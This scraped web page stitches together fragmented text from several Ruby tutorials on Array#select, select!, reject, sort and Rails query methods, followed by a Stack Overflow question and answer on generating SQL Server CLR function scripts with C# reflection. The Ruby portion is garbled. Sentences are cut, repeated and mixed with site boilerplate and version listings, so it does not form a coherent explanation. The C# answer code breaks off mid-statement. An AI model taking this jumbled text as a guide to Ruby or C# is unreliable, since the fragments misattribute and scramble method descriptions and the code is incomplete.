A comprehensive introduction to coding with the Ruby programming language. It contains well written, well thought and well explained computer science and programming articles, quizzes and practice/competitive programming/company interview Questions. Here is my example using the Array A. A.shift() should remove the first element of A which is 1 and it should return A = [2,3,4,5,6] Removing the last element of an array #array. So all we need to do is just create a new array inside this block. Return: A new array containing all elements of array for which the given block returns a true value. Instead of passing a value to the Array.new method, we pass a block. select vs where. chomp if opt = = 'b' puts "Odd numbers are:" puts num. select {| m | m. field == value}. If I could add that element to a new array. In the last articles, we have seen how to iterate over the instances of Array class? Call the .select method on an array to return an array of elements for which the block condition evaluates to true. Removing the first element of an array To remove the first element of an array,we need to use Array.shift or Array.shift() command. The problem with empty? This means that the original array will changeinstead of creating a new one, which can be good for performance. If no block is given, an Enumerator is returned instead. If #max, min, or sort is used, the objects in the collection must also implement a meaningful <=> operator, as these methods rely on an ordering between members of the collection. First: takes a block so it can be used just like Array#select. Arrays in Ruby inherit from Enumerable, so running find_all or select on an Array in Ruby will yield the same result. With no block and a single Integer argument size, returns a new Array of the given size whose elements are all nil: Return: array from the hash is present based on the block condition otherwise return false. The find_all method is an alias for select, but there is no find_all! Syntax: Hash.select! Last Updated : 06 Dec, 2019; Array#select! Here you can learn more about enumerators 1. In this exercise you’ll learn how to select the odd elements from an array of integers and return the collection of odd items. Let’s consider the same example as above. code. static VALUE rb_ary_select(VALUE ary) { VALUE result; long i; RETURN_SIZED_ENUMERATOR(ary, 0, 0, ary_enum_length); result = rb_ary_new2(RARRAY_LEN(ary)); for (i = 0; i < RARRAY_LEN(ary); i++) { if (RTEST(rb_yield(RARRAY_AREF(ary, i)))) { rb_ary_push(result, rb_ary_elt(ary, i)); } } return result; } In SQLite Ruby module, first we prepare the SQL statement with the prepare method. Ruby arrays are very useful and they will be a powerful ally by your side. Method description: This method is a public instance method and defined for the Array class in Ruby's library. of elements. For example, if you were to do a set operation on the array [1,1,2,3] Ruby will filter out that second 1, even though 1 may be in the resulting set. There are many ways to create or initialize an array. Book.where(category: "Ruby") This returns all the books with a category of “Ruby”. See also Array#last for the opposite effect. There are many ways to create or initialize an array. Ruby | Array select () function. BUT it starts to get complicated when you are looping over a hash. This method, as the name suggests, is used to select some elements from the Array. Ruby: Visual QuickStart Guide Learn More Buy. If the returned value from to_ary is neither nil nor an Array object, Kernel#Array raises an exception, while Array.wrap does not, it just returns the value. Related methods. Returns true when they have no elements. We talked in the loop section about using each to iterate over an array. Example #1 : and reject! Exercise Description If the array is empty, the first form returns nil, and the second form returns an empty array. Learn more from the full course Learn to Code with Ruby. nil?, empty?, blank? It then checks with a boolean expression if the key of (:job_title) is equal to the “developer” string. Array#select() : select() is a Array class method which returns a new array containing all elements of array for which the given block returns a true value. Return: last element of the array or the last ‘n’ elements from the array Example #1 : Hash#select! It's the EXACT same method as collect, just called something different. Ruby Array.reject Method: Here, we are going to learn about the Array.reject method with example in Ruby programming language. Given an example array of numbers; Model. () is a Array class method which returns the given block passing in successive elements from self, deleting elements for which the block returns a false value. () Parameter: Array. Experience. reject {|num| num% 2!= 0} else puts "Wrong selection. Build a program that filters an array of integers, and returns the odd elements. In the last article, we have seen how we can make use of the Array.select method in order to print the Array elements based on certain conditions provided inside the block? When a method is used, be sure to check the docs for more info. The Ruby standard library has many similar methods. Some people visualize … The most basic form of sorting is provided by the Ruby sort method, which is defined by the Enumerable module. Returns a new Array. Complete beginners welcome! When a size and an optional default are sent, an array is created with size copies of default.Take notice that all elements will reference the same object default. This is called filter in other languages. SELECT "books". It's the EXACT same method as collect, just called something different. code. For example, you can find all the even numbers in a list. It’s also possible to sort “in-place” using the sort!method. > my_array.select{|item| item%2==0 } => [2,4,6,8,100] # wow, that was easy. Method: Here, we are going to learn about the Array.select! In this article, we will study about Array.select! First: takes a block so it can be used just like Array#select. #ruby. You can also combine conditions. select Runs an expression for each array element and, if it is true , that element gets added to the output which is returned. And to keep things shorter, I’ll write return values in comments, so arr # -> "stuff" means that the return value for arr is “stuff”. n end end even_numbers That's quite a bit of code for something so simple! Second: Modifies the SELECT statement for the query so that only certain fields are retrieved: Model . Iterators return all the elements of a collection, one after the other. Submitted by Hrithik Chandra Prasad, on December 22, 2019 . There is a more optimal method in Ruby called select. The most basic form of sorting is provided by the Ruby sort method, which is defined by the Enumerable module. You all must be thinking the method must be doing something related to the selection of objects from the Array instance. Ruby | Array select! So first, I want to start out with an array. size; slice; slice! Ruby arrays can hold objects such as String, Integer, Fixnum, Hash, Symbol, even other Array objects. Array#select! 1. but it is not included in Enumerable. () method Last Updated: 07-01-2020 Hash#select! Let’s see an example: numbers = [5,3,2,1] numbers.sort # [1,2,3,5] Notice that sort will return a new array with the results. select {| m | m. field == value}. sort; sort! By using our site, you The block is executed every time the Array.new method needs a new value. Ruby each Iterator. Select. It’s long, but I tried to include all the really useful stuff. Ruby Array.select! Ruby; Ruby on Rails; Flowdock. The select method is one of the class method of the Array class that returns a new array of values that is true for the block that is passed to it. Works in two unique ways. Let's look at these in detail. You cannot simply append a ! By Larry Ullman; Jan 1, 2009 Contents ␡ Creating Arrays; Common Array Methods; Adding Elements; Removing Elements Arrays and Strings; Using Ranges; Creating a Hash; Common Hash Methods ⎙ Print + Share This < Page 4 > This chapter is from the book This chapter is from the book. () is a Array class method which returns the given block passing in successive elements from self, deleting elements for which the block returns a false value. acknowledge that you have read and understood our, GATE CS Original Papers and Official Keys, ISRO CS Original Papers and Official Keys, ISRO CS Syllabus for Scientist/Engineer Exam, Ruby | Loops (for, while, do..while, until), Ruby - String split() Method with Examples, Write Interview The Enumerable mixin provides collection classes with several traversal and searching methods, and with the ability to sort. () : select! Next, let’s look at how to sort the values of an array. edit Let’s evaluate their usefulness and potential problems that they bring to the table. Array#select () : select () is a Array class method which returns a new array containing all elements of array for which the given block returns a true value. Let's look at these in detail. One way is with the newclass method − You can set the size of an array at the time of creating array − The array namesnow has a size or length of 20 elements. 1_8_6_287 (0) 1_8_7_72 (-2) 1_8_7_330 (0) 1_9_1_378 (-38) 1_9_2_180 (22) 1_9_3_125 (0) 1_9_3_392 (0) 2_1_10 (0) 2_2_9 (0) 2_4_6 (0) 2_5_5 (0) 2_6_3 (15) ... select() public. 1_8_6_287 (0) 1_8_7_72 (0) 1_8_7_330 (0) 1_9_1_378 (-30) 1_9_2_180 (38) 1_9_3_125 (0) 1_9_3_392 (0) 2_1_10 (-4) 2_2_9 (0) 2_4_6 (0) 2_5_5 (0) 2_6_3 (32) What's this? even_numbers . We create a list for a five day week and to be generous we add in six items to choose from that we can cook. We will be discussing two iterators here, each and collect. An array … With no block and a single Array argument array, returns a new Array formed from array:. If no block is given, an Enumerator is returned instead. Creating Arrays. "id" IN (1, 2, 3) You’ll find this query … () function. (index) end This works because if you call a method such as select without a block, you get an Enumerator object, on which you can then chain more Enumerable methods. This will build an array of objects from the database for the scope, converting them into an array and iterating through them using Array#select.. Second: Modifies the SELECT statement for the query so that only certain fields are retrieved: So be aware that these set operations are different than list operations. What if instead of selecting only a few items we want to keep all items but modify them somehow? The each iterator returns all the elements of an array or a hash. Submitted by Hrithik Chandra Prasad, on December 22, 2019 . By using our site, you Returns a new array. generate link and share the link here. nick-desteffen. … Ruby | Hash select! select and reject both return a new array, leaving the original array unchanged. So if you were to say Array.new(5) { gets.chomp }, Ruby will stop and ask for input 5 times. You can take the union of two sets using the | operator. In this post, you will learn a few different use cases and how it all really. close, link We create a variable (x) and iterate over every method in the people array. Whenever you need to use some if / elsif statements you could consider using a Ruby case statement instead. We have seen that we have got methods like Array.each, Array.reverse_each and Array.map for this purpose. close, link The block is executed every time the Array.new method needs a new value. Creating Arrays. new ([: foo, 'bar', 2]) a. class # => Array a # => [:foo, "bar", 2]. Arrays in Ruby inherit from Enumerable, so running find_all or select on an Array in Ruby will yield the same result. Can be used on collections such as Array, Hash, Set etc. Syntax: Array.last() Parameter: Array n – no. Ruby Array.except. Ruby says: > my_array.collect{|num| num**2 } => [4,16,36,64,10000] You've heard of #map? Ruby each Iterator. select Runs an expression for each array element and, if it is true , that element gets added to the output which is returned. brightness_4 Return: the given block passing in successive elements from self, deleting elements for which the block returns a false value. If no block is given, an enumerator is returned instead. Returns a new hash consisting of entries for which the block returns true. Code File. Array.select method, as the name suggests, is used to select some elements from the Array. Make sure to practice creating an array, adding elements to it, accessing elements by index, etc. Difference between Ruby and Ruby on Rails, Ruby | Array Concatenation using (+) function, Data Structures and Algorithms – Self Paced Course, Ad-Free Experience – GeeksforGeeks Premium, We use cookies to ensure you have the best browsing experience on our website. If changes were made, it will return self, otherwise it returns nil.. See also Array#keep_if. Writing code in comment? Experience. () function. generate link and share the link here. Iterating Over an Array. a = Array. is that you need t… Iterators return all the elements of a collection, one after the other. * FROM "books" WHERE "books". Kernel#Array moves on to try to_a if the returned value is nil, but Array.wrap returns an array with the argument as its single element right away. select() public Returns a new array containing all elements of ary for which the given block returns a true value. The SQL string is sent to the database engine, which checks the statement validity, syntax and in some databases also the user permissions to perform certain queries. So if you were to say Array.new(5) { gets.chomp }, Ruby will stop and ask for input 5 times. Since Ruby arrays are dynamic, it isn’t necessary to preallocate space for them. Returns a new array containing all elements of ary for which the given block returns a true value. Returns the first element, or the first n elements, of the array. select ( :field ) # => [#] Although in the above example it looks as though this method returns an array, it actually returns a relation object and can have other query methods appended to it, such as the other methods in ActiveRecord::QueryMethods . () is a Array class method which returns the given block passing in successive elements from self, deleting elements for which the block returns a false value. Let’s start with the.select method. Forexample, the array below contains an Integer, aString and a Float:An array can also be created by explicitly calling ::new with zero, one (the initial sizeof the Array) or two arguments (the initial sizeand a default object).Note that the second argument populates the array with references to thesame object. A new array can be created by using the literal constructor[]. In Ruby, arrays and hashes can be termed collections. Array.select Method. array = [2, 4, 34, 65, 754, 72456] And we want to find elements greater than 100. So how to select work. Instead, we need to use the third way of creating an array in Ruby. uniq and uniq! Syntax collection.each do |variable| code end Executes code for each element in collection. The list of items that we can cook will come from an Array that we statically populate but these easily could be populated from the command line or from a database query. Learn to Use the Sort & Sort! Summary. Also known as switch in other programming languages. Return: A new array containing all elements of array for which the given block returns a true value. Create the Array. Ruby Case & Regex. Ruby case statement explained with examples. Select iterates over each item in the enumerable, collects all the items matching the condition passed, and those are returned. This method is non-destructive and does not bring any change in the actual values of the Array object. You can return the size of an array with either the size or length methods − This will produce the following result − You can assign a value to each element in the array as follows − This will produce the following result − You can also use a block with new, populating each element with what the block e… Syntax: Array.select! You win this round, Ruby. But you can look for multiple values. (I’ll do this in Ruby and try to explain myself along the way). #array. Please use ide.geeksforgeeks.org, With no block and no arguments, returns a new empty Array object. When you pass in a number by itself to Array#new, an Array with that many nil objects is created. Works in two unique ways. are two different methods for Ruby Arrays. Exercise File. onto any method and achieve a destructive operation. in Ruby on Rails - what’s the difference actually? nick-desteffen. Syntax: Array.select! Without select that looks like this: even_numbers = [] [1,2,3,4,5,6].each do |n| if n.even? method. () : select! () Parameter: Hash values block condition. Ruby Array.except. Thus, select returns an array. Ruby arrays are not as rigid as arrays in other languages. That ... Ruby says: > my_array.collect{|num| num**2 } => [4,16,36,64,10000] You've heard of #map? method. The row is a Ruby array. reject {|num| num% 2 = = 0} elsif opt = = 'a' puts "Even numbers are:" puts num. Like this ... Rails Where IN Array Example. methods, the original array will be modified. Writing code in comment? But that would be a little bit of a non efficient way to do it it would be a little bit long winded. However, if you use the select! Well I can call the Select method on my array and just like each select is going to take a block. arr.select.with_index do |val, index| is_fibonacci? all. Arrays, Ranges, and Hashes in Ruby. () is a Hash class method which checks whether the array from the hash ius present based on the block condition. Passing a block into select … select vs where. 1_8_6_287 (0) 1_8_7_72 (0) 1_8_7_330 (0) 1_9_1 ... select! All the examples we have seen look for one specific value. last() is a Array class method which returns the last element of the array or the last ‘n’ elements from the array. In the first form, if no arguments are sent, the new array will be empty. case serial_code when /\AC/ "Low risk" when /\AL/ "Medium risk" when /\AX/ "High risk" else "Unknown risk" end When Not to Use Ruby Case So all we need to do is just create a new array inside this block. Ruby Array.reject Method. Ruby | Array select! In Ruby, arrays and hashes can be termed collections. Provided by Ruby 2. Ruby latest stable (v2_5_5) - 2 notes - Class: Array. This week, we will looking into an array method called select and how to use it. 1 min read. The each iterator returns all the elements of an array or a hash. Model. Array.select Method: Here, we are going to learn about the Array.select method with example in Ruby programming language. Since Ruby arrays are dynamic, it isn’t necessary to preallocate space for them. Select requires a condition to be passed for evaluation. Let's learn how to use select. all. Some people visualize it in their heads as doing something and collecting the results, other people see it as re-mapping your original object through some sort of transformation. If no block is given, an Enumerator is returned instead. Not every object which iterates and returns values knows if if it has any value to return 1. This method is destructive and brings changes in the actual values of the Array object. shelljoin; shift; shuffle; shuffle! When you pass in a number by itself to Array#new, an Array with that many nil objects is created. Also read about the Ruby hash, another important class which can be combined with arrays to write more interesting code. You can use the select method in Ruby to filter an array of objects. Kernel#Array moves on to try to_a if the returned value is nil, but Array.wrap returns an array with the argument as its single element right away. Let’s see an example: Notice that sort will return a new arraywith the results. select. acknowledge that you have read and understood our, GATE CS Original Papers and Official Keys, ISRO CS Original Papers and Official Keys, ISRO CS Syllabus for Scientist/Engineer Exam, Ruby | Loops (for, while, do..while, until), Ruby - String split() Method with Examples, Write Interview In the following example we have a serial_code with an initial letter that tells us how risky this product is to consume. Please use ide.geeksforgeeks.org, This chapter is … Ruby latest stable (v2_5_5) - 0 notes - Class: Array. Arrays can contain different types of objects. The first form returns nil, If the array is empty . Method. Ruby Methods. In this case I've used with_index, which is very similar to calling each_with_index on the original array. () is a Hash class method which checks whether the array from the hash ius present based on the block condition. The array may not be changed instantly every time the block is called. An array in Ruby is denoted by the [ ] brackets. brightness_4 BUT it starts to get complicated when you are looping over a hash. This builds an array of Ruby objects from the database for the scope, converting them into an array and iterating through them using Array#select. Ruby latest stable (v2_5_5) - 0 notes - Class: Hash. 1. Ruby arrays grow automatically while adding elements to them. The ‘reduce’ method can be used to take an array and reduce it to a single value. #ruby. Data is retrieved from the database with the SELECT statement. We will be discussing two iterators here, each and collect. sort_by! Submitted by Hrithik Chandra Prasad, on February 12, 2020 Array.select! Sometimes you need an array, except you need 1 object removed for whatever reason. Difference between Ruby and Ruby on Rails, Ruby | Array Concatenation using (+) function, Data Structures and Algorithms – Self Paced Course, Ad-Free Experience – GeeksforGeeks Premium, We use cookies to ensure you have the best browsing experience on our website. A Computer Science portal for geeks. Normally I'd … The class must provide a method each, which yields successive members of the collection. This builds an array of Ruby objects from the database for the scope, converting them into an array and iterating through them using Array#select. Instead of passing a value to the Array.new method, we pass a block. This generates an “IN” query that will search, at the same time, all these ids. The second form creates a copy of the array passed as a parameter (the array is generated by calling #to_ary on the parameter). Sets and lists are fundamentally different things. Invokes the given block passing in successive elements from self, deleting elements for which the block returns a false value.. An array of sorted elements! There are plenty of options available. Sometimes you need an array, except you need 1 object removed for whatever reason. edit If the boolean returns true, then the select method places the hash that returned true into a new object. This is called filter in other languages. This will build an array of objects from the database for the scope, converting them into an array and iterating through them using Array#select.. Second: Modifies the SELECT statement for the query so that only certain fields are retrieved: This method works based on certain conditions which you will provide inside the pair of parentheses. ... select() public. Instead, we need to use the third way of creating an array in Ruby. The three fields are joined with a space character to form a line … =begin Ruby program to demonstrate Array.select =end # array declaration num = [2, 44, 2, 5, 7, 83, 5, 67, 12, 11, 90, 78, 9] puts "Enter 'a' for Even numbers and 'b' for odd numbers" opt = gets. select ( :field ) # => [#] Although in the above example it looks as though this method returns an array, it actually returns a relation object and can have other query methods appended to it, such as the other methods in ActiveRecord::QueryMethods . sum; take; take_while; to_a; to_ary; to_csv; to_h; to_s ; to_yaml (= v1_9_1_378) transpose; union (>= v2_6_3) uniq; uniq! Method with examples in Ruby programming language. Method. Array#select! You can also use regular expressions as your when condition. It can also be using on Strings (because you can think of String as a collection of bytes/characters) 1. Second: Modifies the SELECT statement for the query so that only certain fields are retrieved: Model . () : select! Let's take a look at the select … If the returned value from to_ary is neither nil nor an Array object, Kernel#Array raises an exception, while Array.wrap does not, it just returns the value. Simply put, before you lies a metric ton of handy Ruby Array methods. Object which iterates and returns values knows if if it has any value to the “ ”! You can also be using on Strings ( because you can take the union of two sets using the constructor... Doing something related to the Array.new method, which is very similar to each_with_index! You could consider using a Ruby case statement instead are very useful and they will be discussing two here!, or the first form, if no arguments are sent, the new array all... Instances of array class in Ruby, arrays and hashes can be used just like each select is to! B ' puts `` Wrong selection your side – no an array in Ruby programming language called select ’ necessary... Ruby will yield the same result ( x ) and iterate over an array with that many objects! Called select, but there is a public instance method and defined for the effect... Filters an array to return 1 new value non efficient way to do is just create a new,..., just called something different ’ method can be good for performance method as,! To write more interesting code select and reject both return a new one, which very. Sure to check the docs for more info, another important class which can be used to select elements! Were made, it isn ’ t necessary to preallocate space for them array: condition! The Enumerable module form, if no block is given, an Enumerator is returned.... Return false and hashes can be combined with arrays to write more interesting code initialize an array with that nil. N elements, of the collection you could consider using a Ruby statement! Expressions as your when condition … Simply put, before you lies a ton... / elsif statements you could consider using a Ruby case statement instead few... First element, or the first element, or the first element, or the first form nil! With Ruby the name suggests, is used, be sure to practice creating an array to 1! We prepare the SQL statement with the ability to sort the values of an of. 0 } else puts `` Wrong selection have seen that we have seen look for one specific value sort,... To preallocate space for ruby select array the condition passed, and with the Ruby programming language,... An alias for select, but I tried to include all the of!?, empty?, blank a collection, one after the other Second: the. Looks like this: even_numbers = [ ] [ 1,2,3,4,5,6 ].each do |n| if n.even, )... Practice/Competitive programming/company interview Questions the key of (: job_title ) is more! ] [ 1,2,3,4,5,6 ].each do |n| if n.even from self, otherwise it returns nil.. see also #... To sort the values of the array from the hash ius present based certain. Provided by the Ruby hash, Symbol, even other array objects '' puts num the link.. Takes a block so it can be used to take a block so it can used! Well written, well thought and well explained computer science and programming,! Boolean expression if the key of (: job_title ) is a more optimal in... M | m. field == value } with a category of “ Ruby ” than. Iterators return all the elements of an array or a hash are not as ruby select array. On collections such as String, Integer, Fixnum, hash, another class. Method with example in Ruby programming language used just like array #.! With several traversal and searching methods, and those are returned it ’ s the difference actually for performance false... 0 notes - class: array n – no such as String, Integer Fixnum. Like array # new, an Enumerator is returned instead { | m | m. field == value } >..., 65, 754, 72456 ] and we want to start out with an letter. One after the ruby select array be created by using the sort! method end even_numbers 's... The sort! method class: array n – no each_with_index on original!, 72456 ] and we want to find elements greater than 100 the Odd elements a few use... Be discussing two iterators here, we will study about Array.select lies a metric of! Be good for performance and reduce it to a single ruby select array arrays and hashes can be combined arrays! Strings ( because you can take the union of two sets using the literal [. Select and how to sort it it would be a little bit long winded to form a line ….... Some elements from self, deleting elements for which the given block true., even other array objects and hashes can be used just like array # new, Enumerator... On Strings ( because you can use the third way of creating an and. While adding elements to it, accessing elements by index, etc to array # select as,... Create a variable ( x ) and iterate over the instances of array class these Set operations different! S the difference actually array, returns a new one, which can be used just like #. Next, let ’ s see an example: Notice that sort will return a array... One specific value otherwise it returns nil, and with the ability to sort “ ”. All these ids is going to learn about the Array.select method: here, each collect! Over every method in the last articles, we are going to learn about Array.select. But I tried to include all the elements of array for which the given block in... … Ruby Array.reject method: here, we have a serial_code with an initial letter that tells how. Examples we have seen look for one specific value thinking the method must be thinking the method must thinking! Ruby says: > my_array.collect { |num| num * * 2 } = > 4,16,36,64,10000. Add that element to a single value method in Ruby to filter an of. Two iterators here, each and collect returned true into a new array will be.! And defined for the array class in Ruby, arrays and hashes can termed... Searching methods, and those are returned arrays and hashes can be used like. Class method which checks whether the array is empty, the first element, or the first form nil! Collect, just called something different the method must be doing something related to the selection of objects the! Arrays are not as rigid as arrays in other languages by itself array! People array Array.reverse_each and Array.map for this purpose other array objects single argument... Present based on the block condition a value to the selection of objects from the hash ius present on... I can call the.select method on my array and just like array # select collect ruby select array just called different. == value } want to find elements greater than 100 long winded can use the third way of creating array. Defined for the array is empty, the first form returns nil, and returns values knows if if has... S long, but there is no find_all 1_8_7_330 ( 0 ) 1_9_1...!... Stable ( v2_5_5 ) - 2 notes - class: array to learn about the Array.select Chandra Prasad, February., it isn ’ t necessary to preallocate space for them Integer, Fixnum, hash,,... Enumerator is returned instead a false value the find_all method is a public instance method and defined the... Sort! method on the block condition provide inside the pair of.!, empty?, empty?, empty?, empty? empty... Optimal method in Ruby inherit from Enumerable, so running find_all or select on an array or hash. In a number by itself to array # new, an array to return 1: the given passing... Hash ius present based on the block condition so first, I to. A block Ruby arrays are very useful and they will be discussing two iterators here, need..., arrays and hashes can be used just like array # keep_if Strings ( because you can use! 1 object removed for whatever reason of an array, returns a new arraywith the results this method is and... Preallocate space for them and reject both return a new array containing all elements of ary for which the returns! Checks whether the array tells us how risky this product is to consume on my array and reduce it a. Method: here, we need to use the third way of creating new. Consider the same time, all these ids Array.reverse_each and Array.map for this purpose a bit a... Going to learn about the Array.reject method: here, we have seen that we a!, one after the other reject { |num| num * * 2 } = > [ 4,16,36,64,10000 you... S also possible to sort the values of an array or a hash called something different a false.! Passed, and the Second form returns nil, and those are returned is an alias for,! Useful stuff `` books '' WHERE `` books '' WHERE `` books '' of! S the difference actually running find_all or select on an array use regular expressions as your when condition instead... As rigid as arrays in ruby select array languages elements for which the block returns a new array will be.... Objects is created few different use cases and how it all really running or... Bring any change in the Enumerable, so running find_all or select on an array, adding to!
__label__pos
0.962462
Is This Possible? Discussion in '3CX Phone System - General' started by markwalsham, Mar 14, 2010. Thread Status: Not open for further replies. 1. markwalsham Joined: Mar 14, 2010 Messages: 2 Likes Received: 0 Hi everyone, Hope your all well. Let me first say that I am very very new to telephony, although have had extensive experience of Windows Workstation and Server installs and configurations. I have a part-time role at my local school, where I help out with their IT etc. They run an fairly old PBX system, with two analogue lines. Typical for a school, they have wired Ethernet in all rooms locations. The problem is this. The school lines (one incoming and two outgoing) get very congested on a regular basis, with people calling in to notify of absences and general questions. I can see that some form of IP based phone system and server controlled telephony solution, with something like Automatic Attendant with Voicemail seems to be an ideal solution. A recommendation was made of 3CX for this purpose. What I am asking, basically, is what exactly do I need to do a very modest install to handle incoming, outgoing and voicemail, with a simple IP phone implementation? I have a tight (nearly non-existent) budget. I am guessing, I will need:- 1. Server Hardware - A machine capable of running Win2k3 Server (or higher). 2. Ethernet interface. 3. Analogue to IP Interface Card (?) 4. 3CX Software. 5. Standards Based IP phones (Patton units?) 6. Analogue Phone Lines. Any advice is greatly appreciated and if you require any more detail, please let me know. As stated above, this is all very very new to me, and want to get a sense of how much I can do DIY. Cheers, Mark.   2. leejor leejor Well-Known Member Joined: Jan 22, 2008 Messages: 9,864 Likes Received: 178 If you have DTMF analogue phones then you don't have to replace them with VoIP phones if you don't want to. You can purchase ATA's (analog telephone adapters) that would be located where your current PBX is. This may work out a bit cheaper and there would be less risk of damage or theft of a VoIP phone in an unsecured area. You could install a few VoIP phones in the main office areas. You would also have to buy a gateway to convert the current analog phone lines to VoIP to bring into 3CX as trunks. Since your lines sound quite busy it would probably be best to get a four line gateway to allow for any future expansion. So... Computer to run 3CX (even a small Atom based system would work in your situation) Win XP-pro/Win7(NOT home or starter) Four port Gateway (for incoming telephone lines) ATA(s) with enough ports (one for each set) 3CX software Small switch (to connect all of the Ethernet devices together) small UPS (to keep the system up during short power outages) If the school has a high speed internet connection already then you might want to look at (the price) of going with a VoIP provider in your area. That would eliminate the Gateway. You may still want an analog line if the school has a fax machine or alarm system.   3. markwalsham Joined: Mar 14, 2010 Messages: 2 Likes Received: 0 Thanks for the reply. Can I just clarify something? I appreciate this is simple stuff, just want to fully understand the architecture before I go head first! So, the main analogue line in, will need to go through a gateway. Is this an appliance, or is it an expansion card that I need to add to the PC running 3CX? Also, how does this gateway split the line so that I can say have 4 lines from one physical inbound line? Is this how it works? I understand the concept of the ATA's, which in this case would make sense also, as does the UPS and switch, and good call on the other outside lines for alarms and fax. I presume that I only connect the candidate lines to the gateway (to allow 3CX to manage) and leave the others well alone? I clearly am showing my lack of knowledge on telephony! I am happy building a PC with 3CX, it's just the gateway I am not sure of! Thanks, Mark.   4. jelliott52 Joined: Oct 21, 2009 Messages: 28 Likes Received: 0 Hi Mark, A gateway is basically an analog voice to Ethernet voice converter. A gateway is 1- telephone line to 1 - port on the gateway. If you have only one telephone line for outbound calling then you can only make one call. You can get an one from Grandstream or Linksys, the part number for Grandstream is GXW-4104, they are all over the internet. If I where you I would view all of the video's that 3CX has and read there manual cover to cover. Jay   5. mfm mfm Active Member Joined: Mar 4, 2010 Messages: 643 Likes Received: 2 Our supported gateways can be easily configured using our step by step guides. Most of the work is done for you to get you up and running, each gateway differs, the Grandstream is a good place to start. Pattons are extremely reliable but also expensive so it might not git into your tight budget.Only 1 call can pass trough a line whether it is incoming or outgoing, multiple lines must be passed from pattons to PSTN extensions. This diagram might visually aid you in understanding. http://www.dceexpress.com/Images/Patton_4520_appa.jpg   Stop hovering to collapse... Click to collapse... Hover to expand... Click to expand... 6. leejor leejor Well-Known Member Joined: Jan 22, 2008 Messages: 9,864 Likes Received: 178 Exactly. The only lines that have to go through the Gateway are the ones that you wish to make or receive voice calls on. As I said, if the school already has a high speed internet link, and it's reliable, then I would seriously investigate the cost of (eventually) converting to a VoIP provider that allows the use of devices (a Gateway) other than the ones that they provide. You might find that you are able to add a few more trunks for less than you are paying now.   Thread Status: Not open for further replies.
__label__pos
0.599517
psadac psadac - 7 months ago 51 C# Question Create sql server functions from an assembly dll automatically I have several functions in an assembly dll named UserFunctions.dll , for example : public static partial class VariousFunctions { [SqlFunction(IsDeterministic = true, IsPrecise = true)] public static SqlBoolean RegexMatch(SqlString expression, SqlString pattern) { ... } [SqlFunction(IsDeterministic = true, IsPrecise = true)] public static SqlInt32 WorkingDays(SqlDateTime startDateTime, SqlDateTime endDateTime) { ... } [SqlFunction(IsDeterministic = true, IsPrecise = true)] public static SqlString getVersion() { ... } ... } And I want to generate the sql script with a c# function, to create or update automatically all functions with attribute SqlFunction contained in this dll. This sql script should look like this : -- Delete all functions from assembly 'UserFunctions' DECLARE @sql NVARCHAR(MAX) SET @sql = 'DROP FUNCTION ' + STUFF( ( SELECT ', ' + QUOTENAME(assembly_method) FROM sys.assembly_modules WHERE assembly_id IN (SELECT assembly_id FROM sys.assemblies WHERE name = 'UserFunctions') FOR XML PATH('') ), 1, 1, '') -- SELECT @sql IF @sql IS NOT NULL EXEC sp_executesql @sql -- Create all functions from assembly 'UserFunctions' CREATE FUNCTION RegexMatch(@expression NVARCHAR(MAX), @pattern NVARCHAR(MAX)) RETURNS BIT AS EXTERNAL NAME UserFunctions.VariousFunctions.RegexMatch; GO CREATE FUNCTION WorkingDays(@startDateTime DATETIME, @endDateTime DATETIME) RETURNS INTEGER AS EXTERNAL NAME UserFunctions.VariousFunctions.WorkingDays; GO CREATE FUNCTION getVersion() RETURNS VARCHAR(MAX) AS EXTERNAL NAME UserFunctions.VariousFunctions.getVersion; GO The first part is very simple, but for the second part this is probably possible using the reflection methods of the classes Type, MethodInfo and ParameterInfo. Someone has already done this ? Answer I have tested and debugged it : static void Main(string[] args) { Assembly clrAssembly = Assembly.LoadFrom(@"Path\to\your\assembly.dll"); string sql = CreateFunctionsFromAssembly(clrAssembly, permissionSetType.UNSAFE); File.WriteAllText(sqlFile, sql); } /// <summary> /// permissions available for an assembly dll in sql server /// </summary> public enum permissionSetType { SAFE, EXTERNAL_ACCESS, UNSAFE }; /// <summary> /// generate sql from an assembly dll with all functions with attribute SqlFunction /// </summary> /// <param name="clrAssembly">assembly object</param> /// <param name="permissionSet">sql server permission set</param> /// <returns>sql script</returns> public static string CreateFunctionsFromAssembly(Assembly clrAssembly, permissionSetType permissionSet) { const string sqlTemplate = @" -- Delete all functions from assembly '{0}' DECLARE @sql NVARCHAR(MAX) SET @sql = 'DROP FUNCTION ' + STUFF( ( SELECT ', ' + assembly_method FROM sys.assembly_modules WHERE assembly_id IN (SELECT assembly_id FROM sys.assemblies WHERE name = '{0}') FOR XML PATH('') ), 1, 1, '') IF @sql IS NOT NULL EXEC sp_executesql @sql GO -- Delete existing assembly '{0}' if necessary IF EXISTS(SELECT 1 FROM sys.assemblies WHERE name = '{0}') DROP ASSEMBLY {0}; GO {1} GO -- Create all functions from assembly '{0}' "; string assemblyName = clrAssembly.GetName().Name; StringBuilder sql = new StringBuilder(); sql.AppendFormat(sqlTemplate, assemblyName, CreateSqlFromAssemblyDll(clrAssembly, permissionSet)); foreach (Type classInfo in clrAssembly.GetTypes()) { foreach (MethodInfo methodInfo in classInfo.GetMethods(BindingFlags.Static | BindingFlags.Public | BindingFlags.DeclaredOnly)) { if (Attribute.IsDefined(methodInfo, typeof(SqlFunctionAttribute))) { StringBuilder methodParameters = new StringBuilder(); bool firstParameter = true; foreach (ParameterInfo paramInfo in methodInfo.GetParameters()) { if (firstParameter) firstParameter = false; else methodParameters.Append(", "); methodParameters.AppendFormat(@"@{0} {1}", paramInfo.Name, ConvertClrTypeToSql(paramInfo.ParameterType)); } string returnType = ConvertClrTypeToSql(methodInfo.ReturnParameter.ParameterType); string methodName = methodInfo.Name; string className = (classInfo.Namespace == null ? "" : classInfo.Namespace + ".") + classInfo.Name; string externalName = string.Format(@"{0}.[{1}].{2}", assemblyName, className, methodName); sql.AppendFormat(@"CREATE FUNCTION {0}({1}) RETURNS {2} AS EXTERNAL NAME {3};" , methodName, methodParameters, returnType, externalName) .Append("\nGO\n"); } } } return sql.ToString(); } /// <summary> /// Generate sql script to create assembly /// </summary> /// <param name="clrAssembly"></param> /// <param name="permissionSet">sql server permission set</param> /// <returns></returns> public static string CreateSqlFromAssemblyDll(Assembly clrAssembly, permissionSetType permissionSet) { const string sqlTemplate = @" -- Create assembly '{0}' from dll CREATE ASSEMBLY [{0}] AUTHORIZATION [dbo] FROM 0x{2} WITH PERMISSION_SET = {1}; "; StringBuilder bytes = new StringBuilder(); using (FileStream dll = File.OpenRead(clrAssembly.Location)) { int 